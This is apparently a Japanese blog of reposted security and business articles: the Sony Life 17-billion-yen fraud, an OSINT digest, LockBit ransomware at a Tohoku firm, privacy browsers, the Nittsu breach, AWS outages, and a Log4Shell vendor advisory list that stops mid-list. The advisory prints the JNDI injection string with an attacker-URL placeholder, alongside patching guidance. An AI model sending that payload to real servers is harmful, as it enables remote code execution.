「遊ぶカネ欲しさ」ではない？ ソニー生命「170億円事件」に浮かぶ大和銀行「1100億円事件」との意外な共通点（転載）

「遊ぶカネ欲しさ」ではない？　ソニー生命「170億円事件」に浮かぶ大和銀行「1100億円事件」との意外な共通点 

ソニー生命で170億円にものぼる巨額の不正送金事件が発覚した。逮捕された男性社員は、ソニー生命がバミューダ諸島に保有していた完全子会社である「エスエー・リインシュアランス」の口座を介して、米国の別口座へ不正に1億5500万ドルを送金した疑いが持たれているという。

エスエー・リインシュアランス社は2021年9月に解散しており、手続きのさなかに精算を担当していた従業員が資金を移動させたという。被害者であるソニー生命側も、170億円という巨額の資金を従業員が動かせる状態であったことから内部統制についての懸念が生まれてくる。場合によっては法令等順守にかかる内部管理体制の不備があるとして、他の金融機関と同様、金融庁による何らかの行政処分が下される可能性すらある。

近年、従業員による着服や横領といった事件が発覚する例が増えている。2021年9月にはJA高知県の50代職員が、保険契約を勝手に解約して払戻金を受け取るという手口で2011年からの10年で4471万円を不正に着服していることが発覚したばかりだ

2020年には第一生命の元従業員が、合計で19億5000万円を保険契約者から不正に騙（だま）し取っていたことが明らかとなったほか、住友重機械労働組合の積立年金を当時の会計担当であった女性が合計で10億円を超える額を、2013年から2018年にわたって着服していた疑いがあるとして逮捕されている。

上記で挙げたような10億円、20億円といった着服金額だが、これは日産自動車の元会長であるカルロスゴーン氏が私的に流用した日産の資金に匹敵する規模である。ゴーン氏は日産という大企業の会長という立場と、映画顔負けの国外脱出劇といった要素でインパクトが大きいものの、18億円という金額自体は着服事案の中では突出して大きな額とはいえない。

しかし、今回発覚した170億円にのぼる詐取は、これまでの着服事案とは一線を画すレベルで大きい。直近で私的流用が問題となった最も大きい着服事案が大王製紙の事例で、106億円だ。これは従業員ではなく、同族経営者で当時の会長であった井川意高氏がカジノで遊ぶために複数の子会社から総額で106億円を不正に引き出していたもので、ソニー生命の事例はこれをさらに上回る水準である。

創業家で自身が会長という立場であれば、巨額の引き出しがバレないと信じて犯行に出るのも分からなくはないが、今回170億円を引き出したのは一介の社員であり、会社自体も内部管理体制が他業種と比べて厳しい保険会社で行われた事件である点で異質だ。犯行に及んだ社員もまさかバレないと信じて犯行に及ぶほど愚かでもないだろう。

170億円という過去の着服事例からは一線を画す被害金額から考えても、容疑者のソニー生命社員は生活費や遊行費のためではなく、何らかの組織的な事情が介在した結果犯行に及んだ可能性がある。それだけでなく、背後で指示をしていた黒幕や共犯の存在も疑われてきそうだ。

では、今回の着服が私的流用ではないとしたらどのような要因が考えられるだろうか。

可能性としては、不正な取引における損失穴埋めが挙げられる。従業員の不正のうち、被害額が100億円を超える事例のほとんどが、ビジネス上の失敗を穴埋めするための不正取引である。その中でも2つの事件を今回はピックアップしたい。

まずピックアップしたい事例が1995年の大和銀行（現：りそな銀行）のニューヨーク支店で発覚した巨額の不正取引事件である。当時、米国債トレーダーであった井口俊英氏がもたらした11億ドル、当時の為替レートで1100億円にものぼる巨額損失によって、大和銀行は米国から別途巨額の制裁金がかけられただけでなく、米国からの退去命令も受けるといった三重苦に見舞われることとなった。

同氏は、84年に初めて5万ドルを着服したものの、95年までそれが明るみに出ることはなかった。着服がバレずに気が大きくなったのか、その4年後には52万ドルを着服している。きっかけは変動金利債券の取引損失だ。損失が明らかになってトレーダーをクビになることを恐れ、同氏は書類を偽造するなどして、自己裁量の取引を行うようになった。この時井口氏はニューヨーク支店の実質的な支配人であったことから、その不正を指摘できる者が支店にはいなかったのだ。

巨額のポジションは米国の巨大な債券市場を動かすには十分すぎるほどだった。彼が債券を売買するとすぐさまその手口は「トレーダートゥシ」によるものと看破され、徐々に身動きが取れないカモとなり、損失が膨らんでいった。

結局、同氏はもはや1100億円にも膨らんだ損失をトレードで取り返すのは不可能と悟ったのか、当時大和銀行の頭取であった藤田彬氏に自白し事件が明るみに出ることとなったのである。

この事件では、簿外取引の損失をケイマン諸島の法人に付け替えるという、いわゆる“飛ばし”が組織的に行われていた。この策は功を奏し、ケイマン法人に飛ばした損失は穴埋めが上手くいったようで、飛ばしから7年後に解散している。

ソニー生命の事例との共通点は、大和銀行と同じタックスヘイブンであるバミューダ諸島の子会社を介した不正事案となっている点だ、どちらも事件発覚時には解散している点でも類似性がある。海外における関係会社において、どちらのパターンでも一人の従業員に大きな裁量が任されていた点も重なる。

ちなみに、従業員の不正が原因で会社に損害を与えた最も大きい金額は48億2000万ユーロ、当時の為替レートで7600億円である。その人物は同社のトレーダーであったジェローム・ケルビエル氏だ。同氏は本来、同じ商品の市場間の価格差に着目し、安い方を買い、高い方を売ることでリスクを極力抑えて利ざやを稼ぐという裁定取引を任されていた。

しかし、同氏は片方のポジションを架空の取引に偽装するという手口で、裁定取引をしているとみせかけ実際はリスクを取ったポジションで取引を行っていた。ケルビエル氏の不正は2005年から07年までの株高の恩恵を受けているうちは明るみに出ることがなかったが、世界金融危機の発生した08年1月に不正が発覚、ポジションは精算されることとなった。同氏の築いたポジションを全て精算したあとに残ったのは7600億円もの損失だけだった。

動機は「自分が成功し、金融の天才だと誰もが認めるようになると本当に信じていた」というもので、自己承認欲求の高まりが招いた事件であるといえる。

ちなみに、同氏は当然ソシエテジェネラルをクビになったが、この解雇が不当であるとして逆に同社を訴えた。この訴えはなんと第一審で認められ、16年にはソシエテジェネラルに対してケルビエル氏に40万ユーロを賠償する判決を下したのである。理由は、ソシエテジェネラル側はケルビエル氏の不正取引を把握していながら、利益が出ていたため見過ごしていたと認定されたからだ（なおその後、ソシエテジェネラル側は控訴している）。

この2つの事例の他にも、銅の不正取引で3000億円近い損失を出した住商巨額損失事件などが有名だ。ビジネスの中でも金融商品がらみの不正取引は被害額が大きくなりやすい傾向がある。

ソニー生命の事例は、現段階では動機などが明らかになっていないものの、過去事例と照らし合わせれば、「遊ぶ金欲しさ」や「ほんの出来心」といった典型的な着服事案とは明確に区別されるべき犯罪である可能性が高い。全貌の究明が待たれるところである。

週刊OSINT 2021-45号 / WEEK IN OSINT #2021-45（転載）

 

Week in OSINT #2021-45

今号も、役に立つヒントや便利なツールをご紹介します。

忙しくしていると時間が経つのが早いですね。リラックスする時間がほとんどありませんでしたので、もっと静かな時間が近づいていることを願っています。今回は、メールやDMで送られてきたヒントなど、いくつかの素晴らしいコンテンツを確保することができました。ありがとうございます。本当に助かります。

• Wayback Search
• Online Privacy Tips
• Sterra
• Trace Labs Guide

ツール: Wayback Search

Lorenzo Romani氏は、Internet ArchiveのWayback Machineからすべてのコンテンツを簡単にダウンロードできる小さなツールを作成しました。このツールを起動してドメイン名を入力すると、検索してすべてのコンテンツをダウンロードしてくれます。ちょっとした注意点があります。サブフォルダを指定することはできず、ベースとなるドメインのみを指定します。すべてをダウンロードした後は、小さな検索ツールを使って、ダウンロードしたコンテンツの中から特定のキーワードを見つけることができます。このツールにはPython3版とGo版がありますので、使いやすい方を選んでください。

小技: Online Privacy Tips

Twitterユーザーの「Maderas」は、オンラインプライバシーに関するリソースの小さなリストをツイートしました。このリストは、Googleを自分の生活から追い出したいと思っている人のために、さまざまなリソースを集めたGitHubのレポから始まります。また、ブラウザ、検索エンジン、VPN比較シートなどの情報も掲載されています。この情報の中には、2019年12月に最終更新されたとする2番目のVPNシートのように、古いものもあることに注意してください。しかし、それでもこの情報は、あなたが完璧なプライバシーを意識したセットアップを見つけるのに役立つ貴重なものです。

注：ブラウザの自動更新をオフにする方法があります。ただし、セキュリティアップデートも受け取れなくなりますのでご注意ください。猜疑心を持つか、安全を確保するか、賢明な選択をしてください。

ツール: Sterra

Sterraは、Twitterユーザーの「аэт」が開発した新しいツールで、これはInstagram Helperツールの代わりになる便利なツールのようです。この拡張機能ではアカウントを作成する必要があるため、多くの人が（私のように）このツールをやめてしまいました。このパイソンスクリプトはその穴を埋めるもので、フォロワーやフォローしているアカウント、相互フォロワー、そしてバイオグラフィーで得られるすべての情報をダウンロードすることができます。時間の都合上、私自身はこのツールをテストしていませんので、ご自身の責任でお使いください。また、Instagramのスクレイピング制限はかなり厳しいので、失っても構わないアカウントを使うようにしてください。

記事: Trace Labs Guide

osintme.comのブログでは、Trace LabsのCTFガイドを紹介しています。これまでにもいくつかのガイドはありましたが、誰かの個人的な経験やヒントを読むのはいつでもいいものです。CTFに関してだけでなく、一般的にも常に学ぶべきことがあります。準備、心構え、調査そのものに関する素晴らしいヒントです。今回も貴重な情報を得ることができました。

VAIOに楽天モバイルのSIMを入れてみる

以前購入したVAIOに、同じく依然申し込んだ楽天モバイルのSIMを入れてみた。

元々VAIO購入時に1年間有効のSIMがついていたので、バックアップがてらそれを使っていたのだが、1年の有効期限を迎え、PCから直接通信デバイスがあることが非常に便利に思えてきた。

一方、楽天モバイルは1年間無料キャンペーン時に申し込んだものだが、意外に使い勝手が良く、VAIO SIMの有効期限切れとともにVAIOに楽天モバイルのSIMを入れて使ってみることにした。

楽天モバイルのSIMをノートパソコンに突っ込んで使う事例はネットに出ていたが、意外にも全くつながらない。

んで、参考になったのは下記のサイト

楽天モバイルUN-LIMITをVAIO S13 LTE搭載モデルで使う方法（アーカイブ）

特に、下記部分

ーー

そういえば、以前SIMカードを入れ替えた際も、SIMを入れ替えても旧SIMカードの情報を保持して繋がらなかった事を思い出しました。

この手順で以前解決したので試しに行ってみました。

「旧SIMカードを挿入する」→「接続できている事を確認」→「シャットダウン」→「旧SIMカードを抜く」→「SIMなしで起動」→「シャットダウン」→「楽天モバイルSIMカードを挿入」→「起動」→ なぜか繋がる

ーー

実際は上記では復旧しなかったのだが、パソコンの設定に関しては意外にも上記のようなアナログな部分が残る。

そこでもう少し手順を増やしてやってみる

「旧SIMカードを挿入する」→「接続できている事を確認」→「SIMロック解除(VAIO SIMは容量制限があり、必要時にのみ接続するため、SIMにパスコードを設定していた)」→「APN削除」→「シャットダウン」→「旧SIMカードを抜く」→「SIMなしで起動」→「シャットダウン」→「楽天モバイルSIMカードを挿入」→「起動」

これで無事解決。

通信速度も悪くない。

続いてモバイルホットスポットの設定に進む。

ここで新たな問題発生。

設定を有効にしようとすると、「接続を共有するには、最初にこの機能を携帯データ通信プランに追加する必要があります。」と表示される。

日本語のマイクロソフト(マイクソ)コミュニティにも同じ問い合わせがあったが、クソみたいな回答しかなかった。

ネットの世界をいろいろ徘徊した結果、英語のマイクソのコミュティで関連する記事を見つけたが、どうもOSのかなり深いところをいじくる感じである。

 

Googleの新しいフライト検索ハック / Google’s New Flight Search Hack（転載）

Google’s New Flight Search Hack:

航空券を検索する際に、長年にわたって利用してきたのが、現在はGoogleが所有しているITA Matrixでした。これはデモサイトで、実際には予約はできませんでした（ただし、検索結果を利用して予約できるようにするハッキングされたツールはありました）。ITA Matrixは、希望する正確な運賃や経路、航空会社を指定して、旅行期間やその他の機能に基づいて絞り込むことができる、最も迅速で最も強力な検索方法です。

バックエンドは古く、メンテナンスもされていませんが、何人かのGooglerが新しい技術に移植して存続させています。これがその新しいサイトです。もちろん、ほとんどの人はGoogle Flightsを使うでしょう。

実録：ランサムウエアに感染するとこうなる

プリンターが止まらない 戦慄のランサムウエア 被害企業が語った｜サイカルジャーナル｜www3.nhk.or.jp/news/special/s…

プリンターから、突如、大量の紙が出てきた。止まらない。

紙には「あなたの会社のデータは盗まれ、暗号化された」という脅迫のメッセージ。

ことし８月、日本国内の企業で実際に発生した、身代金要求型のサイバー攻撃だ。

これ以上、被害を増やさないためにと、その企業が取材に応じてくれた。

いま何が起きているのか。

地方の産業を支える企業にサイバー攻撃

東北地方にある中堅の食品加工会社。

ことし８月、システム担当者の男性が、出勤して異変に気づいた。

パソコンの画面をクリックして、ファイルを調べると、取り引きデータのファイルがすべてＬｏｃｋｂｉｔというファイル名に書き換えられていた。

クリックしても「問題が発生しました」と表示され、開くことができない。

その直後、複数の部署から、次々と連絡が入った。

「取引などに使用する基幹システムが使えない」

対応に追われていた昼過ぎ、さらに異様な事態が起きた。

突然、プリンターが、大量の印刷物を吐き出し始めたのだ。

「あなたの会社のデータは盗まれ、暗号化された。このままだと闇サイトに公開されることになる」

ハッカー集団からの犯行声明。脅迫のメッセージだった。

印刷物は、社内のほかの拠点のプリンターからも一斉に出てきた。

システム担当者は、ただちに、プリンターの電源を切るよう、各部署に指示した。

プリンターは、ふだんインターネットには直接つながっていない、いわゆるイントラのプリンターだった。

この会社では、警察のアドバイスに従い、ハッカー集団とは、やりとりをしないことにした。

その後、更新していなかったソフトウエアを狙われた可能性があることが分かった。

システムは今も復旧していない。

取引の処理をすべて手入力で行うなど業務の負担は格段に増えている。

ちなみに2021年8月にランサムウエアの被害が発生した日本の組織は下記となる。

いずれかの組織が取材に応じてくれたのだろう。

【フェイクニュース】BlackTechグループが中国内企業へのAPT攻撃を分析（転載）～外国語ソースも重要だが、ニセ情報の存在も認識しなければならない～

 瑞星：BlackTech组织对国内企业APT攻击分析 

最近、ライジングスレットインテリジェンスセンターが中国内企業に対するサイバー攻撃をキャッチしました。 解析の結果、この事件の攻撃者はBlackTech組織であり、フィッシングメールで漢字のマクロ文書をターゲットに配信し、それによってユーザーにクリックと実行を誘惑し、ユーザーデータのアップロードとトロイの木馬のダウンロードを目的とした不正プログラムをリリースすることが判明したのです。 現在、Rising ESM Anti-Virus Terminal Security Protection Systemなどの製品は、この攻撃によるウイルスを遮断し、チェックすることができるので、ユーザーは対応するリスクを回避することができます。

BlackTechは、少なくとも2010年以降、標的に対してサイバー攻撃を仕掛けている脅威集団で、Tatsuya Daitoku、yber Defense Institute、TEMP.Overboard、T-APT-03などとも呼ばれ、情報の窃盗やスパイ活動を中心に活動しているそうです。 BlackTechグループは、中国、日本、台湾、中国香港などの東アジアから、建設、金融、政府、医療、メディアなどの分野での攻撃をターゲットにしています。

Risingのセキュリティ専門家によると、今回の攻撃でRisingがキャプチャしたサンプルは「Yu Tongcai Weekly 1025-1031.xlsm」というマクロ文書で、さらに検索すると「2021-10 給与におけるCPF問題に関する協議」という別の名前を持っていることが判明したとのことです。 xlsmなので、中国語名から、国内企業を狙った攻撃と判断しました。 この文書には、マクロコードによって表示・非表示が制御される2つのワークシートがあり、ユーザを騙してマクロコードを積極的に実行させ、異なるワークシートを表示させ、マクロコードに格納された悪意のあるプログラムをハードコードで解放することで、悪意のある動作を隠すことを目的とした攻撃であると考えられます。

プライバシーとOSINTのための検索エンジンとブラウザの選択 / 30 search engine & browser choices for privacy and OSINT（転載）

 30 search engine & browser choices for privacy and OSINT

今回は、デジタル・プライバシーに焦点を当てます。私たちのオンライン活動の大部分は、ウェブブラウザや検索エンジンに依存しているため、ウェブブラウザや検索エンジンの話ほどぴったりなものはありません。

ここで、プライベートブラウジングに関する一般的な神話の1つである「Incognito / Private Browsing」モードについて説明します。

これらは全く持ってプライベートではありません。

どちらのモードであっても、お客様が閲覧するウェブサイトやアクセスするサービスは、お客様のIPアドレスを読み取り、お客様のブラウザのフィンガープリントを取得し、お客様のユーザーエージェントを認識します。

ウェブサイトからのマルウェアのドライブバイダウンロードなど、オンラインの脅威に対する保護機能は、通常のブラウジングモードと同様です。

最後に、あなたがオンラインで何をしているのか、ISPはまだ見ることができます。

以下に挙げる検索エンジンやブラウザは、必ずしもこれらの懸念事項のすべてに対応しているわけではありません。例えば、ISPのスヌーピングの問題は、VPNを使用することで解決する必要があります（その理由については、1年以上前に書きました）。

これらのあまり知られていないオプションを選択する際に重視したいのがプライバシーであろうとOSINTであろうと、以下の中から十分に選択することができます。

検索エンジン

アルファベット順に掲載されているので、良いもの、便利なものという意味では順不同です。

• Brave Search – https://search.brave.com/ – 人気ブラウザ「Brave」と連動した、プライバシーに配慮した検索エンジンのベータ版です。
• DuckDuckGo –  https://duckduckgo.com/ – おそらく、最もよく知られている、プライバシー重視の検索エンジンです。
• Disconnect Search – https://search.disconnect.me/ – 透過的なプライバシーポリシーを持つDuckDuckGoが提供しています。
• eTools CH – https://www.etools.ch/ – プライバシーを重視した検索エンジンのアグリゲーターで、現在17の検索エンジンが参加しています（その多くはこのリストに掲載されています）。
• Gibiru – https://gibiru.com/ – アカウント不要、クッキー不要、検索ログ不要、閲覧履歴不要です。
• Gigablast – https://www.gigablast.com/ – ニュース、画像、ディレクトリなどのプライベートサーチエンジン。
• Intelligence X – https://intelx.io/ – 多目的でありながら、ウェブインフラからデータリークまで、あらゆる分野に特化した検索エンジンです。しかし、一般的なGoogleのような使い方には適していません。
• Lukol – https://www.lukol.com/ – Googleカスタム検索による匿名での閲覧。Google検索を基本的なドライバーとして使用していますが、アカウントや登録は必要ありません。
• MetaGer – https://metager.org/ – 非営利のNGOが運営する検索エンジン。複数の検索エンジンの結果を組み合わせることで、検閲から守ります。
• Mojeek – https://www.mojeek.com/ – "escaping the big tech "の独立した検索エンジン。
• Oscobo – https://www.oscobo.com/ – ユーザーの詳細情報を収集しない、専用のブラウザもあります。
• Privado – https://www.privado.com/ – privacy focused search engine with a dedicated blog.
• Private SH – https://private.sh/ – 暗号化された検索クエリとプロキシの使用により、プライバシーを実現しています。
• Quant – https://www.qwant.com/ – EUベースの検索エンジンで、ユーザーの活動を追跡しません。広告は表示されるかもしれませんが、ランダムに表示されます。
• Searchencrypt – https://www.searchencrypt.com/ – 15分後に閲覧履歴を削除します。
• SearX – https://searx.space/ – オープンソースの検索エンジンで、ユーザーが作成したローカル検索エンジンのリストを提供し、どこで何がホストされているか、どのように運営されているかについての情報を提供します。
• Startpage – https://www.startpage.com/ – トラッカーや広告ターゲティングをブロックし、ユーザーのIPアドレスをサーバーから削除する検索エンジンです。定期的に更新されるプライバシーブログを運営しています。
• Swisscows – https://swisscows.com/ – プライバシーに配慮し、成人向けコンテンツをブロックするフィルターが組み込まれているため、家族に優しいことが特に強調されています。

ブラウザー

新しいブラウザを使い始める前に、そのプライバシー設定がどのようになっているかをテストしてみるのも良いでしょう。そのためには、次の2つのサイトをお勧めします。

• https://coveryourtracks.eff.org/
• https://browserleaks.com/

ブラウザについては、Safari、Firefox、Chromeのようなわかりやすいものはあえて挙げていません（後者2つはOSINTに最適で、多数の便利な拡張機能があります）。

どのブラウザも同じではありませんが、以下のリストの多くは、特定の目的のために使用することができます。

• Brave – https://brave.com/ – 非常に優れたプライバシー機能を備えたChromiumベースのブラウザで、ブラウザネイティブの暗号通貨ウォレットを内蔵した追加機能を備えています。
• Epic Privacy Browser – https://www.epicbrowser.com/ – 印象的なプライバシー保護とセーフガードのリストを持つブラウザです
• Freenet – https://freenetproject.org/pages/download.html – Webサイトやピアツーピアリソースの分散型ネットワークを閲覧するためのニッチなソフトウェア群であり、メインストリームのブラウザとは異なります。
• Ghost Browser – https://ghostbrowser.com/  – 様々なブラウジングセッションのための複数のユーザーID、ワークスペースやプロキシを提供するブラウザです。無料版と有料版があります。
• Opera – https://www.opera.com/ – チャット機能や無料のVPNサービスを内蔵した、プライバシーに配慮したブラウザです。
• Oscobo – https://www.oscobo.com/ctnt.php?c=download – 上述の検索エンジン「Oscobo」のネイティブブラウザです。
• Osirt Browser – https://osirtbrowser.com/ – 厳密にはOSINTに焦点を当てたブラウザで、自分の仕事を記録するためのものです。2022年には大幅なアップグレードが予定されており、さらに面白いものになるはずです。
• Tor – https://www.torproject.org/download/ – デジタル・プライバシーに興味のある方には、ここで紹介する必要はありません。プライベートブラウジングの真の先駆者です。
• Vivaldi – https://vivaldi.com/ – 分割画面のタブや内蔵メールクライアントなどの革新的な機能を備えた、プライバシー重視のブラウザです。
• Waterfox – https://www.waterfox.net/ – 様々なChromeやFirefoxの拡張機能をサポートしているとのことですが、テレメトリやトラッキングはありません。
• Yacy – https://yacy.net/demonstration_tutorial_screenshot/ – 厳密にはブラウザそのものではなく、ローカルで動作し、ユーザーが設定可能な検索エンジンです。多数のオプションが用意されているため、ブラウザのような感覚で使用することができます。

日本通運のシンガポール現地法人に不正アクセス、情報流出の可能性（転載）

[PDF] 当社シンガポール現地法人における IT システムへの不正アクセスによる情報流出の可能性ついて 日本通運株式会社
nittsu.co.jp/info/pdf/20211…

日通のシンガポール現地法人に不正アクセス、情報流出の可能性

日本通運株式会社は2021年12月9日、同社のシンガポール現地法人のITシステムへの不正アクセスによる情報流出の可能性について発表した。

これは11月14日に、シンガポール現地法人で運用するサーバとパソコンの一部に外部から不正アクセスがあったことを確認し、その後、一部情報が外部に流出した可能性を確認したというもの。

シンガポール現地法人は現時点で、不正アクセスのあった機器のネットワークからの遮断や被害拡大防止のための初動措置を終え、、関係機関への報告を行っている。現在は外部の専門機関も起用し、障害の復旧及び影響を受けた可能性のある情報の特定を進めている。

なお、12月9日時点の調査では、日本を含む他の国や地域におけるシステムへの影響は確認されていない。

プレスリリース（アーカイブ）

【悲報】AWS再び落ちる / AWS down again, outage impacts Twitch, Zoom, PSN, Hulu, others（転載）～クラウドを採用するということは、障害発生時に指をくわえて見守るしかないことを覚悟せよ～

AWS down again, outage impacts Twitch, Zoom, PSN, Hulu, others:

Amazon AWSで障害が発生し、Twitch、Zoom、PSN、Xbox Live、Doordash、Quickbooks Online、Huluなど、多数のオンラインサービスに影響が及んでいます。

AWSのステータスページによると、この継続的な障害は2021年12月15日午前7時43分（PST）頃に始まり、US-WEST-1およびUS-WEST-2リージョンに影響を及ぼしているとのことです。

報告によると、インターネット接続の大きな問題を引き起こし、オンラインプラットフォームやウェブサイトの長いリストをダウンさせています。

AWSのエンジニアは、この障害の背後にある根本的な原因への対処に取り組んでおり、すでに接続性を回復するための措置を講じたと述べています。

"我々はUS-WEST-2リージョンへのインターネット接続の根本原因を特定し、接続性を回復するための措置を講じました。"とAWSのステータスページには書かれています。

"ここ数分でインターネット接続に若干の改善が見られましたが、引き続き完全な復旧に向けて取り組んでいます。"

今回のAWS障害で影響を受けたオンラインサービス

これは、米国北東部の人々や企業に接続を提供するUS-EAST-1リージョンに発生した大規模なAWS障害から1週間後のことです。

その結果、Netflix、Roku、Amazon Primeでのストリーミング再生に直ちに影響が出ました。カメラに接続できなくなったというユーザーの報告によると、Ringデバイスもダウンし、アクセス不能になったとのことです。

アマゾンの配達員も、荷物のスキャンや配達ルートへのアクセス、今後のスケジュールの確認に必要な社内アプリにアクセスできなかったと述べています。

AWSが後に説明したように、そのインシデントは、"メインAWSネットワークでホストされているAWSサービスの1つの容量を拡張する自動化された活動 "が原因で、"内部ネットワークとメインAWSネットワーク間のネットワークデバイスを圧倒する大規模な接続活動のサージが発生した "ものでした。

これらの停止は、2020年11月にUS-EAST-1リージョンに影響を与えた大規模インシデントを含む、2011年以降の他の複数の同様のインシデントに続くものであるため、特別な出来事ではありません。

当時、ストリーミングデータをリアルタイムで処理するAmazonのKinesisサービスに問題が発生し始め、多数のサイトやオンラインプラットフォームがオフラインになりました。

その1年前の2019年9月には、AWSのノースバージニアUS-EAST-1データセンターを襲った停電により、ファイルを復元するためのバックアップが機能していなかったAmazonのすべての顧客がデータ損失を被った。

Javaのログ出力ライブラリ「Apache Log4j」に存在するリモートから悪用可能な脆弱性（CVE-2021-44228）

Log4j: List of vulnerable products and vendor advisories:

2021年12月9日、Apache Log4jのロギング・ライブラリに重大な脆弱性があるというニュースが流れ、概念実証済みの脆弱性が出現しはじめました。

Log4jは、オープンソースのJavaロギングフレームワークで、Apache Logging Servicesの一部として、世界中のベンダーの様々なアプリケーションでエンタープライズレベルで使用されています。

Apacheは、Log4ShellまたはLogJamとも呼ばれる、現在CVE-2021-44228として追跡されている最大深刻度の脆弱性に対処するために、Log4j 2.15.0をリリースしました。

CloudflareとCisco Talosのデータによると、大規模な悪用が始まったのは、悪用コードが自由に利用できるようになってからですが、今月初めから攻撃が検出されています。

Log4Shellの欠陥は、11月24日にAlibabaのクラウドセキュリティチームによって報告されましたが、一部の攻撃者がなぜこれほど早く悪用できたのかは不明です。

Cybersecurity and Infrastructure Security Agency（CISA）のディレクターであるJen Easterly氏は、Log4Shellの脆弱性に関する土曜日の声明で、同機関が民間および公的セクターのパートナーと協力してこの問題に対処していると述べています。

Log4Shell は、Java Naming and Directory Interface (JNDI) インジェクションで、認証されないリモートでのコード実行を可能にします。攻撃者は、ブラウザのユーザーエージェントを次の形式の文字列に変更することで、これを利用することができます。

${jndi:ldap://[attacker_URL]}

この文字列は、被害者のWebサーバーのログに残り、Log4jライブラリがそれを解析すると、攻撃者のURLへのコールバックやリクエストを強制的に実行します。攻撃者は、この文字列を使用して、脆弱なマシンにエンコードされたコマンドやJavaクラスを渡すことができます。

CISAは本日、脆弱性の深刻さとその悪用が容易であることから、Log4Shell攻撃に対する防御を設定するための企業向けガイダンスを発表しました。同機関が推奨するのは、「利用可能なパッチを直ちに適用すること」であり、このプロセスに優先順位をつけることです。

パッチ適用が不可能な場合、同機関は以下の変更を推奨しています。

アプリケーションを起動する Java Virtual Machine コマンドに -Dlog4j2.formatMsgNoLookups=True という文字列を追加して log4j2.formatMsgNoLookups を true に設定する。

この場合、メッセージのフォーマットをルックアップに依存している場合、システムのロギングに影響を与える可能性があるという注意点があります。また、この緩和策はバージョン2.10以降にのみ有効です。

Log4Shellの詳細が判明した直後から、ベンダー各社は自社製品が影響を受けるかどうかの調査を開始し、その結果について情報を提供しています。

Amazon

アマゾンは、いくつかの製品をアップデートし、脆弱性のないバージョンのLog4jコンポーネントを使用するようにし、他の製品もアップデート中であるか、近い将来に新しいバージョンをリリースする予定であると発表しました。

同社は、OpenSearch、AWS Glue、S3、CloudFront、AWS Greengrass、API Gatewayなどの影響を受けるサービスに関する詳細を発表している。

Atlassian

同社の評価によると、オンプレミス製品のデフォルト設定では、悪用されやすい脆弱性はないと考えています。

JMS Appender 機能を有効にするためにデフォルトのログ設定 (log4j.properties) を変更すると、Jira Server & Data Center, Confluence Server & Data Center, Bamboo Server & Data Center, Crowd Server & Data Center, Fisheye, Crucible など一部の製品でリモートコード実行のリスクがもたらされる可能性があるそうです。

Broadcom

同社は、Log4jの脆弱性の影響を受ける複数のシマンテック製品について、緩和策とナレッジベースの記事を公開しました。CA Advanced Authentication、Symantec SiteMinder (CA Single Sign-on)、VIP Authentication Hub、Symantec Endpoint Protection Manager (SEPM)が含まれる。

Cisco

シスコは、Log4Shellの影響を受ける自社製品のリストと、12月14日から一部の製品にパッチを適用するカレンダーを公開しました。

影響を受ける製品は、以下のような様々なカテゴリーに分類されます。

• ネットワークおよびコンテンツセキュリティ機器（Identity Services Engine、Firepower Threat Defense、Advanced Web Security Reporting Application)
• コラボレーションとソーシャルメディア（Cisco Webex Meetings Server）
• ネットワーク管理およびプロビジョニング（Cisco CloudCenter Suite Admin、Data Center Network Manager、IoT Control Center、Network Services Orchestrator、WAN Automation Engine)
• エンタープライズ ルーティングとスイッチング（Cisco Network Assurance Engine、Cisco SD-WAN vManage）

Citrix

調査は現在も進行中であり、一部の製品については状況が変わる可能性がありますが、シトリックスは、Log4Shellの脆弱性がある製品としてリストアップしていません。

ConnectWise

同社のクラウドサービスであるPerchが、「潜在的な脆弱性を持つ」サードパーティーコンポーネントに依存していることが判明した、とConnectWise社のアドバイザリーには書かれています。

脆弱性のあるサードパーティは、ConnectWiseのStratoZenソリューションで使用されているFortiGuardのFortiSIEMと判明し、同社はホスティングされているStratoZenサーバーへのアクセスを一時的に制限するよう促されました。現在では、ほとんどのサービスへのアクセスが回復しています。

cPanel

フォーラムのスレッドによると、cPanelのSolrプラグインが存在するインスタンスのみが影響を受け、悪用される可能性があるが、ローカルにのみ存在するとのことです。

あるスタッフは、Log4Shellに対する緩和策を含むアップデートがcpanel-dovecot-solrパッケージに用意されていることを発表し、さらに安心感を与えてくれました。

Debian

Debian 9 (Stretch), 10 (Buster), 11 (Bullseye), 12 (Bookworm) にセキュリティアップデートとして、パッチを適用した Log4j パッケージが追加されました、と勧告があります。

Docker

Docker Officialイメージの12個に、脆弱性のあるバージョンのLog4jライブラリが使用されていることが判明しています。couchbase、elasticsearch、logstash、sonarqube、solrが含まれる。

Dockerは、「これらのイメージに含まれるLog4j 2を利用可能な最新バージョンに更新中」であり、他の理由でイメージに脆弱性がない可能性があると述べている。

FortiGuard

同社からのアドバイザリーでは、約12の同社製品に脆弱性があるとされており、そのうち4つの製品についてはすでに修正または緩和措置が展開されているとのことです。

FortiGuardは、FortiSIEM、FortiInsight、FortiMonitor、FortiPortal、FortiPolicy、ShieldXなど他の製品の修正プログラム適用時期について、アドバイザリを更新すると発表している。

F-Secure

エフセキュアのいくつかの製品のWindows版とLinux版の両方がLog4Shellの影響を受けています。Policy Manager (Policy Manager Server コンポーネントのみ)、Policy Manager Proxy、Endpoint Proxy、および Elements Connector です。

同社は、この問題を修正するための管理者向けセキュリティパッチを作成し、それを展開するためのステップバイステップの手順を提供しています。

Ghidra

NSAが提供するオープンソースのリバースエンジニアリングツールは、バージョン10.1へのアップデートを受け、Log4jの依存関係を脆弱性のないイテレーションにアップグレードしています。

IBM

IBMのLog4Shellに関するアドバイザリによると、Admin ConsoleとUDDI Registry Applicationコンポーネント経由で、WebSphere Application Serverバージョン9.0と8.5のみが脆弱性の影響を受け、この問題は解決されているとのことです。

Juniper Networks

ネットワーク会社は、同社の4つの製品が影響を受けることを明らかにした。Paragon Active Assurance、Paragon Insights、Paragon Pathfinder、Paragon Plannerの4製品に影響があることを明らかにしました。

評価は継続中ですが、現段階ではさらに6つの製品が影響を受ける可能性があります。JSAシリーズ、Junos Space Management Applications、Junos Space Network Management Platform、Network Director、Secure Analytics、Security Director (Security Director Insightsは除く)

McAfee

同社はまだ評価を完了しておらず、12製品を審査中であり、関連情報が入手でき次第、アドバイザリーを更新する予定です。

MongoDB

Log4Shellに対してパッチを適用する必要があるのはMongoDB Atlas Searchのみであると、本日更新されたアドバイザリーで同社は指摘しています。

開発元は、パッチを適用する前に悪用された証拠や侵害の指標を発見しなかったと付け加えています。

Okta

